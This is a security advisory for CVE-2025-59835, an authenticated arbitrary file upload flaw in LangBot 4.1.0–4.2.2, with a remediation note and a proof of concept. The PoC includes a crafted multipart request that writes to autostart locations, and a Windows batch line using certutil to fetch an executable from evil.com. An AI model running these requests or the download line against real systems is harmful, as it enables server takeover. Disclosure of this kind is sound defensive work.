Skip to content

LangBot has a cross-directory file upload vulnerability, which could potentially lead to system takeover

Moderate
RockChinQ published GHSA-7j3j-qj83-9qv4 Oct 2, 2025

Package

LangBot (Python)

Affected versions

4.1.0~4.2.2

Patched versions

None

Description

LangBot has a cross-directory file upload vulnerability, which could potentially lead to system takeover.

Summary

  • After logging into the LangBot system, an attacker can exploit the /api/v1/files/documents interface to perform arbitrary file uploads. Since this interface does not strictly restrict the storage directory of files on the server, it is possible to upload dangerous files to specific system directories.
  • For example, an attacker could upload SSH private keys or crontab configuration files on Linux systems, or malicious batch scripts to the Windows startup directory. These hazardous operations could potentially result in the server being taken over by the attacker.

Details

  • The LangBot system has an interface /api/v1/files/documents that allows users to upload documents. This interface directly parses the name of the uploaded file and uses os.path.join to concatenate it with the data/storage directory, ultimately completing the content write operation.
image-20250905165646697 image-20250905170413130

  • However, there are certain limitations. Since the filename is split by "." into an array, the program only takes the parts at index 0 and -1 as the filename and extension, respectively, and concatenates an 8-character random string in between. This makes it impossible to use "../" for directory traversal.

  • But python's os.path.join has a characteristic that allows us to achieve directory traversal without using "../". Instead, we can directly use the absolute path of the file. See the following example

image-20250905195432242
  • When the second parameter of os.path.join is an absolute path, the preceding parameter is ignored.
import os
path_base = os.path.join("web","upload")
path_two = "/tmp/test.txt"
print(os.path.join(path_base, path_two))

# /tmp/test.txt
  • If an attacker uploads a file with a specially crafted filename, it may be possible to upload the file to a directory outside of data/storage.

Windows

  • Such as C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.
image-20250905194111947
  • Construct and send the data packet. It can be observed that the malicious .bat file has been written to the startup directory. Simply restart the Windows system to execute it.

Linux

  • On Linux systems, due to filename restrictions, certain dangerous directories such as /etc/cron.d and ~/.ssh cannot be used. Alternative directories must have absolute paths that do not contain ., and even if filenames are not fully customized, they can be executed automatically or conditionally.

  • Based on my knowledge, I have only found two directories that may partially meet the requirements: /etc/systemd/system and /etc/xdg/autostart. The former requires manual enabling by the user, which is clearly unreasonable. In contrast, the latter requires the target server to be a desktop edition, a condition that is relatively more acceptable.

image-20250905223106047

Remediation Recommendations

  • Get the file name and remove special characters (e.g., /, \, ., etc.), or use quote for URL encoding.

PoC

......
Content-Disposition: form-data; name="file"; filename="C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.bat"

certutil -urlcache -split -f http://evil.com/evil.exe C:\Windows\Temp\evil.exe
......

Data packet

POST /api/v1/files/documents HTTP/1.1
Host: 192.168.195.150:5300
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWFhQGFhLmNvbSIsImlzcyI6IkxhbmdCb3QtY29tbXVuaXR5IiwiZXhwIjoxNzU3NzE2MTYxfQ.PCcPGo8dflzUnsccbvm30G2ww9qXdt31CMPz_CHMMFQ
Origin: http://192.168.1.105:5300
Sec-GPC: 1
Connection: close
Referer: http://192.168.1.105:5300/home/models
Priority: u=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytewrOVXbsOVk3wBO
Content-Length: 198

------WebKitFormBoundarytewrOVXbsOVk3wBO
Content-Disposition: form-data; name="file"; filename=" /etc/xdg/autostart/auto.desktop"

touch /tmp/success
------WebKitFormBoundarytewrOVXbsOVk3wBO--

Impact

  • Users of the Langbot system with versions from 4.1.0 to the latest (4.2.2), whose backend has been accessed by attackers or has weak passwords, may be at risk of being attacked.

Severity

Moderate

CVE ID

CVE-2025-59835

Weaknesses

Relative Path Traversal

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as .. that can resolve to a location that is outside of that directory. Learn more on MITRE.

Unrestricted Upload of File with Dangerous Type

The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Learn more on MITRE.

Credits